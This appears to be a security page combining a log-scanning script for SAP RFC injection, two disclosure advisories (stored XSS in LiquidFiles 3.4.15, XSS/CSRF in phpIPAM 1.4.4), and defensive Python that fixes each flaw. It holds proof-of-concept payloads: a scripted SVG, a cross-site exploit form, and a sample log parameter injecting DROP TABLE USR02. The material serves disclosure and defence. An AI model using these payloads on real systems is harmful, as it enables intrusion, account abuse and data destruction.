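    r"EXEC\s+SQL|ENDEXEC|ENDSELECT|\bUPDATE\b|\bDROP\b|\bDELETE\b|\bINSERT\b|;|\.\s",
    re.IGNORECASE,
)


@dataclass
class Finding:
    ts: str
    user: str
    fm: str
    reason: str


def suspicious_params(params):
    """Return (name, value) pairs carrying a statement fragment instead of a
    plain name. Known limit: a bare keyword such as ENDEXEC is itself a valid
    identifier and passes, so this is triage, not a substitute for the fix."""
    hits = []
    for name, value in params.items():
        if not isinstance(value, str) or DDIC_NAME.match(value):
            continue
        if STATEMENT_FRAGMENT.search(value):
            hits.append((name, value))
    return hits


def analyze(record):
    """Produce findings for one RFC call record."""
    ts, user, fm = record.get("ts", ""), record.get("user", ""), record.get("fm", "")
    params = record.get("params", {})
    findings = []
    cve = VULNERABLE_FUNCTION_MODULES.get(fm)
    if cve:
        findings.append(Finding(ts, user, fm, f"call to function module covered by {cve}"))
    for name, value in params.items():
        if isinstance(value, str) and value.upper() in SENSITIVE_TABLES:
            findings.append(Finding(ts, user, fm, f"parameter {name} references sensitive table {value}"))
    for name, value in suspicious_params(params):
        findings.append(Finding(ts, user, fm, f"statement fragment in parameter {name}: {value!r}"))
    return findings


def scan(lines):
    """Scan JSON-lines records; malformed lines are skipped, not fatal."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(analyze(record))
    return findings


# Constructed sample log (not a real SAP log format). Parameter values on the
# second and third records are taken from the advisory's proof-of-concept tables.
SAMPLE_LOG = """
{"ts": "2022-05-18T09:00:01Z", "user": "JSMITH", "fm": "Z_CONSTRUCTED_REPORT", "params": {"PERIOD": "202205"}}
{"ts": "2022-05-18T09:00:07Z", "user": "RFC_SVC", "fm": "RSDL_DB_GET_DATA_BWS", "params": {"I_S_TABSEL.NAME": "USR02", "I_T_DBFIELDS.NAME": "PWDSALTEDHASH"}}
{"ts": "2022-05-18T09:00:09Z", "user": "RFC_SVC", "fm": "CONVERT_FROM_CHAR_SORT_RFW", "params": {"RTABNAME": "X. EXEC SQL. DROP TABLE USR02-", "RFIELDNAME": "ENDEXEC"}}
this line is not JSON and is skipped
{"ts": "2022-05-18T09:00:12Z", "user": "RFC_SVC", "fm": "SRM_RFC_SUBMIT_REPORT", "params": {"REPORTNAME": "Z_CONSTRUCTED_REPORT"}}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.ts} {f.user:8} {f.fm:28} {f.reason}")
```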
<pre><code>=====[ Tempest Security Intelligence - ADV-12/2021 ]==========================<br /><br />LiquidFiles - 3.4.15<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents ]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgements<br /> * References<br /><br />=====[ Vulnerability Information ]=============================================<br /> * Class: Improper Neutralization of Input During Web Page Generation<br /> ('Cross-site Scripting') [CWE-79]<br /><br /> * CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N<br /><br />=====[ Overview ]========================================================<br /> * System affected : LiquidFiles<br /> * Software Version : Version - 3.4.15<br /> * Impacts :<br /> * XSS: LiquidFiles 3.4.15 has stored XSS through the "send email"<br />functionality when sending a file via email to an administrator. When a<br />file has no extension and contains malicious HTML / JavaScript content<br />(such as SVG with HTML content), the payload is executed upon a click. This<br />is fixed in 3.5.<br /><br /><br /><br />=====[ Detailed description ]=================================================<br /><br />* Stored XSS at [http://localhost:8080/message/new]:<br /><br />* Steps to reproduce<br /><br />1 - Create a file without an extension, containing the content below:<br />```<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,100 100,0" fill="#0000FF"<br />stroke="#0000FF"/><br /> <script type="text/javascript"><br /> alert(1);<br /> </script><br /></svg><br />```<br />2 - As an external user, send an email with that file (without any<br />extension) to an admin or another user.<br /><br />3 - With the admin account, open the "Data" menu, click "Messages", and<br />select the message sent in step 2. In the table, click the filename of<br />your file; the JavaScript code will be executed.<br /><br />=====[ Timeline of disclosure ]===============================================<br /><br />11/Jan/2021 - Responsible disclosure was initiated with the vendor.<br />12/Jan/2021 - LiquidFiles Support confirmed the issue.<br />18/Feb/2021 - The vendor fixed the vulnerability (the second stored XSS).<br />06/Apr/2021 - CVE was assigned and reserved as CVE-2021-30140.<br /><br />=====[ Thanks & Acknowledgements ]========================================<br /> * Tempest Security Intelligence [3]<br /><br />=====[ References ]=====================================================<br /><br />[1] https://cwe.mitre.org/data/definitions/79.html<br />[2] https://gist.github.com/rodnt/9f7d368fac38cafa7334598ec94fb167<br />[3] https://www.tempest.com.br/<br /><br />=====[ EOF ]===========================================================<br />--<br /><br /></code></pre>
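<p>The root cause above is that a stored file with no extension is handed to the browser, which renders it as SVG/HTML and runs the script. As an added example (not LiquidFiles code), the following sniffs an upload's content to decide safe download headers regardless of extension; the header set, the INERT_TYPES allowlist and the PNG sample bytes are assumptions, and the SVG sample is the one from the advisory.</p>

```python
"""Choose safe download headers for a stored upload by inspecting its bytes,
not its extension (added example; not LiquidFiles code). The SVG sample is
the advisory's; the header set and allowlist below are assumptions."""
import re
from typing import Dict, Optional

# Leading bytes a browser would treat as a document it can render and script.
MARKUP_START = re.compile(rb"^\s*(<\?xml|<!doctype|<svg|<html|<script|<body)", re.IGNORECASE)
# Script hooks anywhere in the probed prefix (tags, event handlers, URLs).
SCRIPT_HOOK = re.compile(rb"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

# Declared types served as-is when they survive the content check. SVG is
# deliberately absent: it is an XML document that can carry scripts.
INERT_TYPES = {"image/png", "image/jpeg", "image/gif", "text/plain"}


def is_active_markup(data: bytes, probe: int = 4096) -> bool:
    """True when the file looks like XML/HTML/SVG or carries script hooks,
    whatever its name says (or does not say, when it has no extension)."""
    head = data[:probe]
    if head.startswith(b"\xef\xbb\xbf"):  # a UTF-8 BOM must not hide the '<'
        head = head[3:]
    return bool(MARKUP_START.match(head) or SCRIPT_HOOK.search(head))


def safe_filename(name: str) -> str:
    """Strip characters that could terminate or split the header value."""
    cleaned = re.sub(r'[\r\n"\\]', "", name).strip()
    return (cleaned or "download")[:255]


def download_headers(filename: str, data: bytes, declared_type: Optional[str]) -> Dict[str, str]:
    """Headers for returning an upload to a browser: always an attachment,
    never sniffed, and demoted to octet-stream unless provably inert."""
    if is_active_markup(data) or declared_type not in INERT_TYPES:
        content_type = "application/octet-stream"
    else:
        content_type = declared_type
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe_filename(filename)}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# The advisory's extension-less SVG, embedded as sample input.
SVG_SAMPLE = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,100 100,0" fill="#0000FF" stroke="#0000FF"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>
"""
# Constructed: PNG signature followed by filler, enough for the check.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, data, declared in (("triangle", SVG_SAMPLE, "image/svg+xml"),
                                 ("logo.png", PNG_SAMPLE, "image/png")):
        print(name, download_headers(name, data, declared))
```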
<pre><code>=====[ Tempest Security Intelligence - ADV-03/2022 ]==========================<br /><br />PHPIPAM - Version 1.4.4<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents ]==================================================<br /><br />* Overview<br />* Detailed description<br />* Timeline of disclosure<br />* Thanks & Acknowledgements<br />* References<br /><br />=====[ Vulnerability Information ]=============================================<br /><br />* Class: Improper Neutralization of Input During Web Page Generation<br />('Cross-Site Scripting') [CWE-79]<br />* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L<br /><br />* Class: Cross-Site Request Forgery (CSRF) [CWE-352]<br />* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L<br /><br /><br />=====[ Overview ]========================================================<br /><br /> * System affected: PHPIPAM - Version 1.4.4<br /> * Software Version: Version 1.4.4 (other versions may also be affected).<br /> * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF)<br />and Cross-Site Scripting (XSS) via<br />app/admin/subnets/find_free_section_subnets.php. An attacker can exploit<br />this by injecting JavaScript code to coerce an admin user into performing<br />unintended actions.<br /><br />=====[ Detailed description ]=================================================<br /><br />The HTML code below exploits both vulnerabilities in the same way, because<br />the affected forms do not contain CSRF tokens and are vulnerable to XSS<br />attacks. An attacker can therefore host the forms on a malicious host and<br />trick an administrator into visiting that page. If successful, the<br />JavaScript code will execute.<br /><br />* [app/admin/subnets/find_free_section_subnets.php]<br /><br /><html><br /> <body><br /> <h1> Exploit PHPIPAM </h1><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php"<br />method="POST"><br /> <input type="hidden" name="container" value="body" /><br /> <input type="hidden" name="placement" value="top" /><br /> <input type="hidden" name="sectionid" value="2'><input<br />onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>"<br />/><br /> <input type="hidden" name="original-title" value="Search for free<br />subnets in section " /><br /> <input type="submit" value="Exploit" /><br /> </form><br /> </body><br /></html><br /><br /><br /><br />=====[ Timeline of disclosure ]===============================================<br /><br />13/Jan/2022 - Responsible disclosure was initiated with the vendor.<br /><br />14/Jan/2022 - PHPIPAM confirmed the issues.<br /><br />17/Jan/2022 - The vendor fixed the XSS and CSRF issues.<br /><br />24/Mar/2022 - CVE reserved as CVE-2021-46426.<br /><br />25/Mar/2022 - CVE assigned [5].<br /><br />=====[ Thanks & Acknowledgements ]========================================<br /><br />* Tempest Security Intelligence [4]<br /><br />=====[ References ]=====================================================<br /><br />[1] https://cwe.mitre.org/data/definitions/352.html<br /><br />[2] https://cwe.mitre.org/data/definitions/79.html<br /><br />[3] https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351<br /><br />[4] https://www.tempest.com.br/<br /><br />[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426<br /><br />[6] Thanks to Celso (CGB) =)<br /><br />=====[ EOF ]===========================================================<br /><br />--<br /><br /></code></pre>
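<p>Server-side hardening for an endpoint shaped like app/admin/subnets/find_free_section_subnets.php, as an added example that is neither phpipam's code nor its actual fix: a per-session CSRF token rejects the cross-site form above, and reflected parameters are validated or HTML-escaped so the advisory's sectionid payload can no longer reach the page as markup. The handler signature and the session and form dictionaries are assumed.</p>

```python
"""CSRF token check plus output escaping for a form endpoint shaped like the
one in the advisory (added example; not phpipam code or phpipam's fix)."""
import hmac
import html
import secrets
from typing import Dict, Tuple

# Form fields from the advisory's proof of concept, including its sectionid
# payload. Used below only as the negative test input.
ATTACK_FORM = {
    "container": "body",
    "placement": "top",
    "sectionid": "2'><input onpointerleave=\"alert(1)\">rodnt</input><script>alert('incogbyte')</script>",
    "original-title": "Search for free subnets in section ",
}


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create (or reuse) the session's token; legitimate forms embed it as a
    hidden field, which a form hosted on another origin cannot obtain."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_ok(session: Dict[str, str], form: Dict[str, str]) -> bool:
    """Constant-time comparison of the submitted token with the session's."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_find_free_subnets(session: Dict[str, str], form: Dict[str, str]) -> Tuple[int, str]:
    """Return (status, html_fragment). Order matters: reject forged requests
    first, then validate typed fields, then escape anything reflected."""
    if not csrf_ok(session, form):
        return 403, "<p>Invalid or missing CSRF token.</p>"
    section_id = form.get("sectionid", "")
    if not section_id.isdigit():  # an id is numeric; markup never belongs here
        return 400, "<p>sectionid must be numeric.</p>"
    # Free-text fields are escaped for both text and attribute contexts.
    title = html.escape(form.get("original-title", ""), quote=True)
    fragment = (
        f"<h4>{title}{section_id}</h4>"
        f'<input type="hidden" name="sectionid" value="{section_id}">'
    )
    return 200, fragment


if __name__ == "__main__":
    sess: Dict[str, str] = {}
    print(handle_find_free_subnets(sess, ATTACK_FORM))  # 403: no token
    legit = {"sectionid": "2", "original-title": "Search for free subnets in section ",
             "csrf_token": issue_csrf_token(sess)}
    print(handle_find_free_subnets(sess, legit))        # 200, escaped output
```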